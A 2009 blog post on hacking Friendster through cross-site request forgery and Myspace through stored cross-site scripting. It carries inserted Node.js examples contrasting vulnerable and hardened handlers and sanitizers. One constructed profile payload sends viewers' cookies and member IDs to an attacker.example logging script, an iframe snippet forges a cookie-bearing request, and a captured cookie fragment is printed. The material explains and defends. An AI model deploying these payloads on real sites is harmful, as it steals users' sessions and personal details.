How To Hack Friendster, Part 1

Posted Aug 12, 2009 by creez

This is the first in a series of articles that expose security flaws in social networks. The two hacks described here are both cross-site attacks: the Friendster one is what is now called cross-site request forgery (a page on another site makes the viewer's browser call a Friendster function with the viewer's own session), and the Myspace one is stored cross-site scripting.

Hacking Friendster, Part I

EDITOR'S NOTE: I have posted these hacks in the hopes of publicizing security holes and forcing the networks to close them. Please do not send me email, myspace messages, or friendster messages asking me to spend my free time helping you duplicate this hack. Both Myspace and Friendster have modified their sites enough so that these hacks no longer work. In addition, this article contained far more than enough information to duplicate these hacks (when they worked), and still contains enough information to build similar hacks today. If you do not understand how to make similar hacks, consider doing your own research. If you want my help learning CGI and DHTML/JavaScript, I am available as an independent contractor and instructor at the rate of $60/hr. If you contact me asking for assistance in stealing other people's personal information I will forward your email to the relevant social network's abuse contact person, and recommend that they deactivate your account.


My Friendster profile links to my homepage, and my homepage embeds an iframe whose src is a GET request, with the parameters in the query string, to Friendster's "Forward this profile to another user" function.

In other words, when you load my webpage while logged in to Friendster, your browser loads that iframe, sends your Friendster session cookie along with the request, and Friendster emails me as though you had forwarded my profile. That email contains: your first and last name, the email address you used to sign up to Friendster, your Friendster user ID, and a link which I can use to sign up to Friendster and automatically become your friend. There is no record of this anywhere on your Friendster account; it is totally invisible.

Here's the code in my homepage:
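The author's iframe markup did not survive in this copy of the article. What follows is an added example, not the author's code and not Friendster's: it models the pattern described above in Node.js, with a hypothetical forward.jsp endpoint, hypothetical parameter and cookie names, and a constructed session store, and puts the vulnerable GET handler beside a hardened one that requires POST plus a per-session anti-forgery token. The same model applies to the Myspace variant later in the article, where the cookie-bearing GET comes from an image's src rather than an iframe.

```javascript
"use strict";

// Constructed session store: session cookie value -> logged-in user.
// Names, ids and addresses are made up for the example.
const SESSIONS = new Map([
  ["sess-victim", { userId: 1001, firstName: "Alice", lastName: "Victim", email: "alice@example.invalid" }],
]);

// Per-session anti-forgery secret, issued only with the real "forward" form
// served on friendster.example, so a page on another origin cannot read it.
const CSRF_TOKENS = new Map([["sess-victim", "tok-9f3a7c"]]);

// Compare tokens without leaking the position of the first mismatch.
function constantTimeEqual(a, b) {
  if (typeof a !== "string" || typeof b !== "string" || a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// A request as the server sees it. The browser attaches the session cookie
// automatically, whether the navigation started on friendster.example or in
// an iframe on an attacker's homepage.
function makeRequest({ method, query = {}, cookie, csrfToken = null }) {
  return { method, query, cookie, csrfToken };
}

function forwardBody(user) {
  return `${user.firstName} ${user.lastName} <${user.email}> (id ${user.userId}) has forwarded a profile to you`;
}

// Vulnerable handler (the behaviour the article describes): a plain GET with a
// valid cookie is enough to email the viewer's details to whoever query.to names.
function forwardVulnerable(req, outbox) {
  const user = SESSIONS.get(req.cookie);
  if (!user) return { status: 401 };
  outbox.push({ to: String(req.query.to), body: forwardBody(user) });
  return { status: 200 };
}

// Hardened handler: a state change needs POST and a token bound to the session.
function forwardHardened(req, outbox) {
  const user = SESSIONS.get(req.cookie);
  if (!user) return { status: 401 };
  if (req.method !== "POST") return { status: 405 };
  if (!constantTimeEqual(req.csrfToken, CSRF_TOKENS.get(req.cookie))) return { status: 403 };
  outbox.push({ to: String(req.query.to), body: forwardBody(user) });
  return { status: 200 };
}

// What the attacker's homepage carries: a 1x1 iframe whose src is the GET
// endpoint with the attacker's own user id in the query string.
function attackerIframe(attackerId) {
  return `<iframe width="1" height="1" src="http://friendster.example/forward.jsp?to=${encodeURIComponent(attackerId)}"></iframe>`;
}

// A logged-in victim loads the attacker's homepage: the iframe fires a
// cookie-bearing GET the victim never sees. `outbox` collects sent emails.
function simulateVisit(handler, attackerId) {
  const outbox = [];
  const res = handler(makeRequest({ method: "GET", query: { to: attackerId }, cookie: "sess-victim" }), outbox);
  return { status: res.status, emailsSent: outbox.length, outbox };
}

// Legitimate use of the hardened endpoint from the real form, token included.
function legitimateForward(targetId) {
  const outbox = [];
  const req = makeRequest({ method: "POST", query: { to: targetId }, cookie: "sess-victim", csrfToken: CSRF_TOKENS.get("sess-victim") });
  const res = forwardHardened(req, outbox);
  return { status: res.status, emailsSent: outbox.length };
}

console.log(attackerIframe("229243"));
console.log("vulnerable:", simulateVisit(forwardVulnerable, "229243"));
console.log("hardened:  ", simulateVisit(forwardHardened, "229243"));
```

The token is the server-side control; today a browser's SameSite cookie default and the Origin header add defence in depth, but neither existed when this article was written, which is why a cookie-authenticated GET with side effects was enough.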

Here's a sample of what gets sent in email:

Matt Chisholm has forwarded a user's profile to you from Matt's
personal network on Friendster.

Matt is 27 in San Francisco, CA.

If you are a Friendster member, you can view Matt's profile by
clicking below:
http://www.friendster.com/user.jsp?id=229243

If you are not a Friendster member yet, you can join Friendster by
clicking below:
http://www.friendster.com/join.jsp?inviteuser=229243

Friendster is an online community that connects people through networks
of friends for dating or making new friends.

Once you join Friendster, you will be automatically connected to your
friend Matt, and all of Matt's friends.

Friendster is inadvertently impervious to this attack, however, since you are often logged out within moments of logging in, and when you do successfully stay logged in, the site is either too slow or by that point my profile is no longer in your "Personal Network."

Myspace's security holes, while they have been narrowed, are much deeper. For a long time, Myspace allowed free HTML entry in all fields, and it still allows some HTML.

For a long time, you could embed an image in your Myspace profile whose src pointed at another Myspace function, so anyone viewing your profile (or any text you had authored) executed that function, with your parameters, using their own logged-in session.

In these heady days of Myspace hackability, Jonathan & I created some interesting myspace hacks, which he will describe in a later post.

At some point, someone at Myspace wised up, and stopped allowing HTTP GET requests, and then they blacklisted the and tags, added JavaScript to their pages to prevent them being loaded in frames, and at least once someone removed a hack from my profile. (Plus for some reason they don't allow # characters in text.)

Myspace hasn't completely closed off its security holes, however. JavaScript event handler attributes are still allowed, as are image tags, so you can embed a 1x1 image with an onload handler and execute arbitrary JavaScript when it loads.

My JavaScript of choice attempts to log who is viewing my profile, by sending the content of the launchIC function, which contains the viewer's UID, and all of their browser cookies, to PHP on my site which mails it to me.

The email I get looks like this (you can see my user ID down there being assigned to memberID, and the cookie content varies greatly depending on what the user has been doing):

myspace view from
IMREQUESTCHECK={ts '2004-02-05 00:43:03'}
MYUSERINFO=M)NOMP_;R2P6%P]>35)6OF/N$5%:C4MIYK,N7@Y'!2\N
6R ??S\/&1/[**0K:R_DIS10DSZOKX@ !
function launchIC(destinationMemberID) {
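As an added example (not the author's payload and not Myspace's filter), here is the 1x1-image onload pattern described above run through two sanitizers in Node.js: a tag blacklist of the kind the article says Myspace adopted, and an allowlist that keeps only known tags and attributes. The profile text, the attacker.example host and the log.php path are constructed for the example; launchIC is the Myspace function the author names.

```javascript
"use strict";

// Constructed attacker-controlled profile text (not a real Myspace profile).
// The img onload is the pattern the article describes: ship the source of
// launchIC (which holds the viewer's member id) plus document.cookie to a
// script on the attacker's host. attacker.example and log.php are hypothetical.
const PROFILE_HTML = [
  "<b>about me</b>",
  '<img src="http://attacker.example/1x1.gif" width="1" height="1" ' +
    "onload=\"(new Image()).src='http://attacker.example/log.php?d='" +
    "+encodeURIComponent(launchIC.toString()+document.cookie)\">",
  '<a href="javascript:alert(document.cookie)">click</a>',
  "<script>alert(1)</script>",
  '<iframe src="http://attacker.example/"></iframe>',
].join("\n");

// Blacklist filter: remove a fixed set of known-bad tags and keep the rest.
// This is the style of fix the article describes; it never looks at attributes.
const TAG_BLACKLIST = ["script", "iframe", "object", "embed"];
function blacklistSanitize(html) {
  let out = html;
  for (const tag of TAG_BLACKLIST) {
    out = out.replace(new RegExp(`<\\/?${tag}\\b[^>]*>`, "gi"), "");
  }
  return out;
}

// Allowlist filter: keep only these tags, and per tag only these attributes.
// Every on* handler is dropped simply by not being listed.
const ALLOWED = new Map([
  ["b", []],
  ["i", []],
  ["a", ["href"]],
  ["img", ["src", "width", "height"]],
]);

function escapeText(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/"/g, "&quot;");
}

// Accept only http(s) or scheme-less URLs. Whitespace and control characters
// are stripped first because browsers ignore them inside "java\tscript:".
function isSafeUrl(value) {
  const v = value.replace(/[\s\u0000-\u001f]/g, "").toLowerCase();
  if (/^https?:\/\//.test(v)) return true;
  return !v.includes(":");
}

function allowlistSanitize(html) {
  const ATTR_RE = /([a-zA-Z][a-zA-Z0-9-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  return html
    .split(/(<[^>]*>)/)
    .map((tok) => {
      if (!tok.startsWith("<")) return escapeText(tok);      // text node
      const m = /^<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>$/.exec(tok);
      if (!m) return escapeText(tok);                         // malformed tag becomes text
      const [, slash, rawName, attrText] = m;
      const name = rawName.toLowerCase();
      if (!ALLOWED.has(name)) return "";                      // unknown tag dropped
      if (slash) return `</${name}>`;
      const kept = [];
      for (const a of attrText.matchAll(ATTR_RE)) {
        const attr = a[1].toLowerCase();
        const val = a[2] ?? a[3] ?? a[4];
        if (!ALLOWED.get(name).includes(attr)) continue;      // drops onload and friends
        if ((attr === "href" || attr === "src") && !isSafeUrl(val)) continue;
        kept.push(`${attr}="${escapeText(val)}"`);
      }
      return kept.length ? `<${name} ${kept.join(" ")}>` : `<${name}>`;
    })
    .join("");
}

// Cheap detector for comparing the two outputs: does anything script-capable survive?
function hasActiveContent(html) {
  return /<script\b/i.test(html) || /<iframe\b/i.test(html) ||
    /\bon[a-z]+\s*=/i.test(html) || /javascript:/i.test(html);
}

console.log("blacklist leaves active content:", hasActiveContent(blacklistSanitize(PROFILE_HTML)));
console.log("allowlist leaves active content:", hasActiveContent(allowlistSanitize(PROFILE_HTML)));
```

The blacklist output still carries the onload handler and the javascript: link, which is exactly the gap the article describes. The allowlist output keeps the remote image itself, so a viewer's IP address and user agent still reach attacker.example when the image is fetched; stopping that requires proxying or disallowing off-site images, not better attribute filtering.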
